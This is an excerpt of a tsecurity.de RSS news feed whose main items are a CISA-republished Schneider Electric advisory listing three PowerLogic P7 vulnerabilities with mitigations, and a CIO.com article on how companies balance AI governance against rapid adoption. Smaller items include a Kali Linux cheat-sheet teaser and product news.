<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/top-20-kali-linux-commands-every-hacker-must-know-2026/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/top-20-kali-linux-commands-every-hacker-must-know-2026/">Top 20 Kali Linux Commands Every Hacker Must Know (2026)</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Top 20 Kali Linux Commands Every Hacker Must Know (2026)]]></title>
<description><![CDATA[Top 20 Kali Linux Commands Every Hacker Must Know (2026) Whether you just installed Kali Linux for the…
The post Top 20 Kali Linux Commands Every Hacker Must Know (2026) appeared first on Hackers Online Club.]]></description>
<link>https://tsecurity.de/de/3626315/it-security-nachrichten/top-20-kali-linux-commands-every-hacker-must-know-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626315/it-security-nachrichten/top-20-kali-linux-commands-every-hacker-must-know-2026/</guid>
<pubDate>Fri, 26 Jun 2026 07:07:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Top 20 Kali Linux Commands Every Hacker Must Know (2026) Whether you just installed Kali Linux for the…</p>
<p>The post <a href="https://hackersonlineclub.com/kali-linux-commands-cheatsheet/">Top 20 Kali Linux Commands Every Hacker Must Know (2026)</a> appeared first on <a href="https://hackersonlineclub.com/">Hackers Online Club</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Anker Charger Goes Everywhere With Me, and It's Less Than $35 for Prime Day]]></title>
<description><![CDATA[The Anker 622 MagGo stays on the back of my phone so a low battery is never a concern.]]></description>
<link>https://tsecurity.de/de/3625871/it-nachrichten/this-anker-charger-goes-everywhere-with-me-and-its-less-than-35-for-prime-day/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625871/it-nachrichten/this-anker-charger-goes-everywhere-with-me-and-its-less-than-35-for-prime-day/</guid>
<pubDate>Thu, 25 Jun 2026 23:18:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Anker 622 MagGo stays on the back of my phone so a low battery is never a concern.]]></content:encoded>
</item>
<item>
<title><![CDATA['We're going to look back at this day as the moment we shifted safety into the next gear': Samsara's new 360 camera and AI tools look to make work sites safer and smarter for all]]></title>
<description><![CDATA[Samsara's new 360 Camera and AI Multicam look to improve safety and visibility for work teams everywhere.]]></description>
<link>https://tsecurity.de/de/3625541/it-nachrichten/were-going-to-look-back-at-this-day-as-the-moment-we-shifted-safety-into-the-next-gear-samsaras-new-360-camera-and-ai-tools-look-to-make-work-sites-safer-and-smarter-for-all/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625541/it-nachrichten/were-going-to-look-back-at-this-day-as-the-moment-we-shifted-safety-into-the-next-gear-samsaras-new-360-camera-and-ai-tools-look-to-make-work-sites-safer-and-smarter-for-all/</guid>
<pubDate>Thu, 25 Jun 2026 20:02:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Samsara's new 360 Camera and AI Multicam look to improve safety and visibility for work teams everywhere.]]></content:encoded>
</item>
<item>
<title><![CDATA[Schneider Electric PowerLogic P7]]></title>
<description><![CDATA[View CSAF
Summary
Schneider Electric is aware of a vulnerability in its PowerLogic™ P7 product. The PowerLogic™ P7 is a protection and control platform designed for complex and advanced electrical network applications. Failure to apply the remediation provided below may risk unauthorized executio...]]></description>
<link>https://tsecurity.de/de/3625457/it-security-nachrichten/schneider-electric-powerlogic-p7/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625457/it-security-nachrichten/schneider-electric-powerlogic-p7/</guid>
<pubDate>Thu, 25 Jun 2026 19:24:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-176-07.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Schneider Electric is aware of a vulnerability in its PowerLogic™ P7 product. The PowerLogic™ P7 is a protection and control platform designed for complex and advanced electrical network applications. Failure to apply the remediation provided below may risk unauthorized execution of privileged commands or loss of HMI operability and configuration functionality, which could result in loss of control over system operations and disruption of critical services.</strong></p>
<p>The following versions of Schneider Electric PowerLogic P7 are affected:</p>
<ul>
<li>PowerLogic™ P7 vers:intdot/&lt;=0.2.003.001.000</li>
<li>PowerLogic™ P7 0.2.003.001.000 </li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 7.5</td>
<td>Schneider Electric</td>
<td>Schneider Electric PowerLogic P7</td>
<td>NULL Pointer Dereference, Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), Reachable Assertion</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Commercial Facilities, Critical Manufacturing, Energy</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>France</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-9716</a></h3>
<div class="csaf-accordion-content">
<p>CWE-476 NULL Pointer Dereference vulnerability exists that could cause a denial-of-service condition, rendering the device’s HMI and configuration functionality unavailable when malformed requests are received over exposed network interfaces.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-9716">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Schneider Electric PowerLogic P7</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Schneider Electric</div>
<div class="ics-version"><strong>Product Version:</strong><br>PowerLogic™ P7 version 0.2.003.001.000 and prior</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Version V02.004.001 of PowerLogicTM P7 includes a fix for this vulnerability and is available for download. Contact Schneider Electric’s Customer Care Center to download this firmware. Reboot needed: Yes</p>
<p><strong>Mitigation</strong><br>If customers choose not to apply the remediation provided above, they should immediately apply the following mitigations to reduce the risk of exploit: • Restrict network access to P7 service endpoints (ports 8080 and 3702) • Monitor and alert on anomalous SOAP requests targeting wsApp • Limit administrative access and apply least privilege principles for all users interacting with P7.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-9717</a></h3>
<div class="csaf-accordion-content">
<p>CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability exists that could allow unauthorized execution of commands with elevated privileges, impacting system integrity, confidentiality, and availability when a privileged authenticated user interacts with a vulnerable network-exposed service.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-9717">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Schneider Electric PowerLogic P7</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Schneider Electric</div>
<div class="ics-version"><strong>Product Version:</strong><br>PowerLogic™ P7 version 0.2.003.001.000 and prior</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Version V02.004.001 of PowerLogicTM P7 includes a fix for this vulnerability and is available for download. Contact Schneider Electric’s Customer Care Center to download this firmware. Reboot needed: Yes</p>
<p><strong>Mitigation</strong><br>If customers choose not to apply the remediation provided above, they should immediately apply the following mitigations to reduce the risk of exploit: • Restrict network access to P7 service endpoints (ports 8080 and 3702) • Monitor and alert on anomalous SOAP requests targeting wsApp • Limit administrative access and apply least privilege principles for all users interacting with P7.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.2</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-9718</a></h3>
<div class="csaf-accordion-content">
<p>CWE-617 Reachable Assertion vulnerability exists that could allow an authenticated attacker to trigger a denial-of-service condition, impacting system availability when a specially crafted request is sent to a vulnerable network-exposed service.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-9718">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Schneider Electric PowerLogic P7</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Schneider Electric</div>
<div class="ics-version"><strong>Product Version:</strong><br>PowerLogic™ P7 version 0.2.003.001.000 and prior</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Version V02.004.001 of PowerLogicTM P7 includes a fix for this vulnerability and is available for download. Contact Schneider Electric’s Customer Care Center to download this firmware. Reboot needed: Yes</p>
<p><strong>Mitigation</strong><br>If customers choose not to apply the remediation provided above, they should immediately apply the following mitigations to reduce the risk of exploit: • Restrict network access to P7 service endpoints (ports 8080 and 3702) • Monitor and alert on anomalous SOAP requests targeting wsApp • Limit administrative access and apply least privilege principles for all users interacting with P7.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/617.html">CWE-617 Reachable Assertion</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.9</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Schneider Electric CPCERT reported these vulnerabilities to CISA.</li>
<li>Cytrics reported these vulnerabilities to Schneider Electric.</li>
</ul>
<hr>
<h2>General Security Recommendations</h2>
<p>We strongly recommend the following industry cybersecurity best practices. https://www.se.com/us/en/download/document/7EN52-0390/ * Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network. * Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks. * Place all controllers in locked cabinets and never leave them in the “Program” mode. * Never connect programming software to any network other than the network intended for that device. * Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks. * Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation. * Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet. * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices. For more information refer to the Schneider Electric Recommended Cybersecurity Best Practices document.</p>
<hr>
<h2>For More Information</h2>
<p>This document provides an overview of the identified vulnerability or vulnerabilities and actions required to mitigate. For more details and assistance on how to protect your installation, contact your local Schneider Electric representative or Schneider Electric Industrial Cybersecurity Services: https://www.se.com/ww/en/work/solutions/cybersecurity/. These organizations will be fully aware of this situation and can support you through the process. For further information related to cybersecurity in Schneider Electric’s products, visit the company’s cybersecurity support portal page: https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp</p>
<hr>
<h2>LEGAL DISCLAIMER</h2>
<p>THIS NOTIFICATION DOCUMENT, THE INFORMATION CONTAINED HEREIN, AND ANY MATERIALS LINKED FROM IT (COLLECTIVELY, THIS “NOTIFICATION”) ARE INTENDED TO HELP PROVIDE AN OVERVIEW OF THE IDENTIFIED SITUATION AND SUGGESTED MITIGATION ACTIONS, REMEDIATION, FIX, AND/OR GENERAL SECURITY RECOMMENDATIONS AND IS PROVIDED ON AN “AS-IS” BASIS WITHOUT WARRANTY OR GUARANTEE OF ANY KIND. SCHNEIDER ELECTRIC DISCLAIMS ALL WARRANTIES RELATING TO THIS NOTIFICATION, EITHER EXPRESS OR IMPLIED, INCLUDING WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. SCHNEIDER ELECTRIC MAKES NO WARRANTY THAT THE NOTIFICATION WILL RESOLVE THE IDENTIFIED SITUATION. IN NO EVENT SHALL SCHNEIDER ELECTRIC BE LIABLE FOR ANY DAMAGES OR LOSSES WHATSOEVER IN CONNECTION WITH THIS NOTIFICATION, INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF SCHNEIDER ELECTRIC HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. YOUR USE OF THIS NOTIFICATION IS AT YOUR OWN RISK, AND YOU ARE SOLELY LIABLE FOR ANY DAMAGES TO YOUR SYSTEMS OR ASSETS OR OTHER LOSSES THAT MAY RESULT FROM YOUR USE OF THIS NOTIFICATION. SCHNEIDER ELECTRIC RESERVES THE RIGHT TO UPDATE OR CHANGE THIS NOTIFICATION AT ANY TIME AND IN ITS SOLE DISCRETION</p>
<hr>
<h2>About Schneider Electric</h2>
<p>At Schneider, we believe access to energy and digital is a basic human right. We empower all to do more with less, ensuring Life Is On everywhere, for everyone, at every moment. We provide energy and automation digital solutions for efficiency and sustainability. We combine world-leading energy technologies, real-time automation, software and services into integrated solutions for Homes, Buildings, Data Centers, Infrastructure and Industries. We are committed to unleash the infinite possibilities of an open, global, innovative community that is passionate with our Meaningful Purpose, Inclusive and Empowered values. www.se.com</p>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability.</p>
<p>Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolate them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<hr>
<h2>Advisory Conversion Disclaimer</h2>
<p>This ICSA is a verbatim republication of Schneider Electric CPCERT SEVD-2026-160-03 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Schneider Electric CPCERT directly for any questions regarding this advisory.</p>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-06-09</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-06-09</td>
<td>1</td>
<td>Original Release</td>
</tr>
<tr>
<td>2026-06-25</td>
<td>2</td>
<td>Initial CISA Republication of Schneider Electric CPCERT SEVD-2026-160-03 advisory</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[Behörden greifen ein: Millionen von Passwörtern mit Malware erbeutet - Golem.de]]></title>
<description><![CDATA[IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) ... IT-Security-Awareness für Systemadministratoren: virtueller Ein-Tages-Workshop ...]]></description>
<link>https://tsecurity.de/de/3625388/it-security-nachrichten/behoerden-greifen-ein-millionen-von-passwoertern-mit-malware-erbeutet-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625388/it-security-nachrichten/behoerden-greifen-ein-millionen-von-passwoertern-mit-malware-erbeutet-golemde/</guid>
<pubDate>Thu, 25 Jun 2026 19:06:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) ... <b>IT</b>-<b>Security</b>-Awareness für Systemadministratoren: virtueller Ein-Tages-Workshop ...]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs rethink the balance between AI oversight and innovation]]></title>
<description><![CDATA[The new CIO mandate is clear: facilitate AI adoption across the enterprise at speed.



According to CIO.com’s State of the CIO survey, CEOs’ top priority for their IT executives is to capitalize on AI. From researching to evaluating AI products, CIOs are now the central figures in their organiza...]]></description>
<link>https://tsecurity.de/de/3624049/it-security-nachrichten/cios-rethink-the-balance-between-ai-oversight-and-innovation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624049/it-security-nachrichten/cios-rethink-the-balance-between-ai-oversight-and-innovation/</guid>
<pubDate>Thu, 25 Jun 2026 12:08:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The new CIO mandate is clear: facilitate AI adoption across the enterprise at speed.</p>



<p>According to CIO.com’s <a href="https://us.resources.cio.com/resources/state-of-the-cio/" rel="nofollow">State of the CIO survey, CEOs’ to</a>p priority for their IT executives is to <a href="https://www.cio.com/article/4171959/ceos-top-priorities-for-it-leaders-today-2.html">capitalize on AI</a>. From researching to evaluating AI products, CIOs are now the central figures in their organizations’ AI strategies.</p>



<p>And company leaders are looking for real outcomes. Almost two-thirds of senior leaders report there is more pressure to prove ROI on their AI investments than a year ago, according to <a href="https://www.kyndryl.com/us/en/insights/readiness-report-2025" rel="nofollow">Kyndryl’s 2025 Readiness Report</a>.</p>



<p>Numerous sources — from the board, to the CEO, to business units and competitors — are behind this pressure, says <a href="https://www.linkedin.com/in/tushman/" rel="nofollow">Jonathan Tushman</a>, chief AI officer and CTO at Hi Marley, a customer conversational platform for the property and casualty insurance industry.</p>



<p>Succeeding in the task ahead of them requires complex conversations, and getting through legal, compliance, and other checks “at a reasonable clip,” adds Tushman, who added CAIO to his remit more than 18 months ago but has felt added urgency in the past six months. In professional gatherings, board conversations, and almost everywhere across the business world, the conversation turns to AI — and then quickly the fear of failing behind.</p>



<p>That includes employees as well. “It’s the engineering team and there’s everybody else — marketing, sales, finance. It’s people who are not AI-native, but they’re very eager to use these tools at an early level,” he says.</p>



<p>As CIOs find themselves facing pressure to scale and demonstrate real value, the challenge is keeping up with risk considerations — without creating unnecessary friction.</p>



<p>“CIOs cannot be risk averse on this,” says <a href="https://www.linkedin.com/in/chakraj/" rel="nofollow">Karthik Chakkarapani</a>, SVP, CIO, and head of enterprise AI at Zuora. “We need to do security and governance, but we don’t want to be seen as slowing down the process. You have to build the highway with enough guardrails and fewer speed breakers.”</p>



<p>Moreover, he adds, “this is not about automating existing work. This is reimagining how work gets done.”</p>



<h2 class="wp-block-heading">AI is a step-change in risk management</h2>



<p>Most IT leaders are a long way from feeling comfortable with the new AI risk management balancing act. Just 31% of respondents feel completely ready across external business risks, Kyndryl’s survey reports.</p>



<p>Tushman believes two things are genuinely different about the risks AI introduces. The first is that AI is indeterminate, whereas most technology is deterministic. “You can’t prove an AI system will or won’t do X, so the traditional ‘put controls around it and verify’ model breaks down,” he says. “We need a different way to govern something whose behavior you fundamentally can’t pin down.”</p>



<p>The second is the gravitational pull on end-users. “With most tech, IT could take its time evaluating before rollout,” he says. “With AI, if you don’t put powerful tools in front of people fast, they’ll route around you — and shadow use creates more risk than controlled access ever would. The timeline compresses at the same time the control model gets harder.”</p>



<p><a href="https://www.linkedin.com/in/tonyvizza/" rel="nofollow">Tony Vizza,</a> founder and managing partner of Novera, agrees that the instinct to move fast can lead to the exact failures everyone fears.</p>



<p>“This might be staff putting sensitive information into public tools without a proper governance structure, or people copying and pasting straight out of AI and sending incorrect deliverables to customers,” says Vizza.</p>



<p>Organizations should avoid jumping into AI <a href="https://www.cio.com/article/4164155/your-ceo-just-got-ai-fomo-here-are-6-tips-on-what-to-do-next.html">because of the fear of missing out</a> without first clarifying where and how it will be used. All risk decisions should flow from these questions, he says. “What problems are you trying to solve — is it better customer service or deeper insight into your data? What are you actually trying to do?”</p>



<p>Vizza recommends guiding AI decisions with a risk assessment that considers expected outcomes, size of investment, and its importance to the organization’s objectives. “You define your risk appetite, build a risk register, and define what risk treatment should be for each risk,” he says. “For example, if you’re going to use a public AI model, you might treat that risk by not putting sensitive data in or buying the right license so that if you do, you’re covered, or getting guidance from the regulator before you proceed.”</p>



<p>Organizations must also consider AI services as a third-party risk, and not leave all accountability with AI providers, Vizza says. “You can’t outsource the responsibility,” he adds.</p>



<p>Due diligence is required to understand what is in the AI provider’s contract, who is responsible if they have a data breach, and how your organization can pursue them if something goes wrong.</p>



<p>“Some organizations build that into their risk management process. Others are quite flippant or don’t even know they should be asking those questions — and that’s what gets them stuck down the track,” he says.</p>



<h2 class="wp-block-heading">The importance of organizational design</h2>



<p>At Hi Marley, Tushman and team have made structural decisions to foster “healthy internal tensions” that are intended to surface and address AI risk considerations. This includes separation between the “AI adopters” in the product and technical teams and the “AI oversight” teams in compliance and legal. Compliance owns the audits, security concerns, and ongoing oversight, while legal owns the documentation that describes the boundaries. “The key is that it’s independent from the teams pushing AI forward,” he says.</p>



<p>“Companies need to invest seriously in these compliance functions. Hire smart, nuanced people. These roles can’t just be ‘no’ machines, but they can’t rubber-stamp everything either. The value is in the judgment,” he says.</p>



<p>Tushman’s role is the AI innovation steward, spearheading AI adoption that includes being challenged on risk, compliance, and legal considerations. “We have a senior leadership team and we have ‘conflict by design’ within that group,” he says. “I play the CAIO role and next to me, I have our head of legal and our head of compliance. So in that leadership team, if we have ‘conflict,’ we’re able to understand the trade-offs and make a decision as a group.”</p>



<p>Tushman believes this creates healthy tension: Innovation-minded leaders push boundaries while compliance and risk leaders counterbalance them. But if a decision can’t be reached, it goes to the CEO. “I do recommend a [split decision] goes to another officer in the organization,” he says.</p>



<p>Decisions about organizational structure could prove to be as consequential as the AI adoption decisions themselves, Tushman says. “The companies that get the organizational design right early will have a real advantage,” he explains.</p>



<h2 class="wp-block-heading">Desire for AI advances the risk equation</h2>



<p>One of the features of the AI wave is the thirst for access — from the board to employees — to use the tools, build applications, and start putting them to work. “Right now, everyone’s dying to try it,” says Tushman.</p>



<p>Hi Marley is in the “activation” phase — meeting the appetite for the tools with safety wrappers. “My main goal here is to have people learn the tools, start using them, and gain some competency with them,” he says. “We will get to the measurement phase, but I think spending too much time on measuring right now is not worth the effort.”</p>



<p>Tushman, like many, is watching how quickly models improve. “AI has huge implications for how you organize, how you hire, and what buy‑versus‑build decisions you make,” he says.</p>



<p>Zuora, which specializes in software for subscription and recurring revenue businesses, is three years into its AI journey. Chakkarapani is adamant that speed for speed’s sake is not the goal.</p>



<p>“We don’t want to take an existing process and just make it faster. You’re just making a process more chaotic. Can we make it fast, smarter, and reorganize it?”</p>



<p>Vizza believes a good percentage of CIOs will need external help to navigate the push for rapid AI adoption. “Or they’ll need to upskill themselves, because AI operates very differently to traditional IT,” he says.</p>



<p>His advice is threefold. First, “make your decisions on the right basis — either learn how AI really works or bring in someone who can advise you properly,” he says. Second, bring it back to the business purpose. “There are opportunities with AI, but the core question is, ‘What are we trying to achieve by bringing this in?’” And third, work out how you’re going to manage the risk. “Risk isn’t necessarily a bad thing — Formula 1 cars are risky, but they have very good braking systems so they can go faster,” he says. “It’s the same with AI: You put the right risk management in place so the business can move quickly without suffering adverse consequences.”</p>



<p>In its almost three-year AI journey, Zuora started with experimentation before moving 12 enterprise-wide pilots into production, Chakkarapani says, adding that there are three pillars to assess potential AI projects against: effort, value, and confidence. “Effort includes the security risk,” he says. “Is it low, medium, or high?”</p>



<p>Chakkarapani’s team started with simple executions, although the first experiments didn’t go as hoped — providing valuable lessons for the following ones. “We learned AI is only good when you have the right data — the right content, context, and governance,” he says.</p>



<p>They moved on to IT service management and that’s when the practical learnings really started, gaining feedback from internal teams and users, answering the security and governance questions, and iterating as they went.</p>



<p>Early applications include marketing, sales, product, and technology, achieving 10x to 25x throughput improvements. Success is measured in business outcomes such as growth, cost saving, customer engagement.</p>



<p>Through this process, the team has been doing the “behind the scenes” work to speed AI adoption across the company. “We realized that to go at speed and scale, we need to have the right trust, security, and governance underlying it,” he says.</p>



<p>An enterprise-wide platform connects Zuora’s approved AI services, including ChatGPT and domain-specific tools, to its structured and unstructured data. On top of this is the context layer and services so that people can build their own applications. It uses each employee’s existing login and organizational profile, and it respects the same role-based security.</p>



<p>“We slowly developed the framework that became our blueprint with the 10 to 12 things that need to be considered when creating an AI-driven application. When someone is interested, they’re taken to the self-directed process with these do’s and don’ts that is automatically downloaded as a markdown file to that person’s computer,” he says.</p>



<p>The ultimate aim is delivering up to 100x business value through an enterprise-wide governed platform — covering IT, HR, finance, legal, procurement, sales, and product. IT plays the role of orchestrator, providing the platform to access the tools and agents and collaborating with the business team to reorganize that workflow.</p>



<h2 class="wp-block-heading">The AI maturity model</h2>



<p>Chakkarapani believes the more secure the environment, the more it paves the way for experimentation, adoption, and, in time, business results. At Zuora, Chakkarapani has evolved this process through three levels of organizational AI maturity to date:</p>



<p><strong>Level 1:</strong> IT provides a platform and services. Employees have controlled access to data based on their role and security privileges. They can create their own agent for themselves. If something doesn’t pass the minimal security and compliance and requirements, it cannot move ahead.</p>



<p><strong>Level 2:</strong> An employee-built agent goes through an IT governance check for duplication or overlap, model improvements, security scans, and manual reviews. If approved, it’s shared with the wider enterprise. “We’re doing well on that, but it’s still a lot of manual work because there are no tools in the market that can automate this,” he says.</p>



<p><strong>Level 3:</strong> At this stage of maturity, an organization has established a secure foundation across its applications so AI can scale safely. At Zuora, over six to eight months the team tightened endpoint and application security, enforced mobile device management, introduced AI usage monitoring (including what staff upload into prompts), and disabled Google authentication to block personal or bulk email accounts from accessing unapproved apps.</p>



<p>Earlier this year, the team embarked on working toward Level 4 maturity, where anyone can create a functioning application with minimal human involvement. Realistically, they expect to be 80% to 85% zero-touch because the final mile will still require human involvement.</p>



<p>“My goal is to provide a zero-touch service for anybody in the organization to create applications. If we do, they can go from a concept to an idea, prototype, design, and production — and they do it in less than two weeks,” he says.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
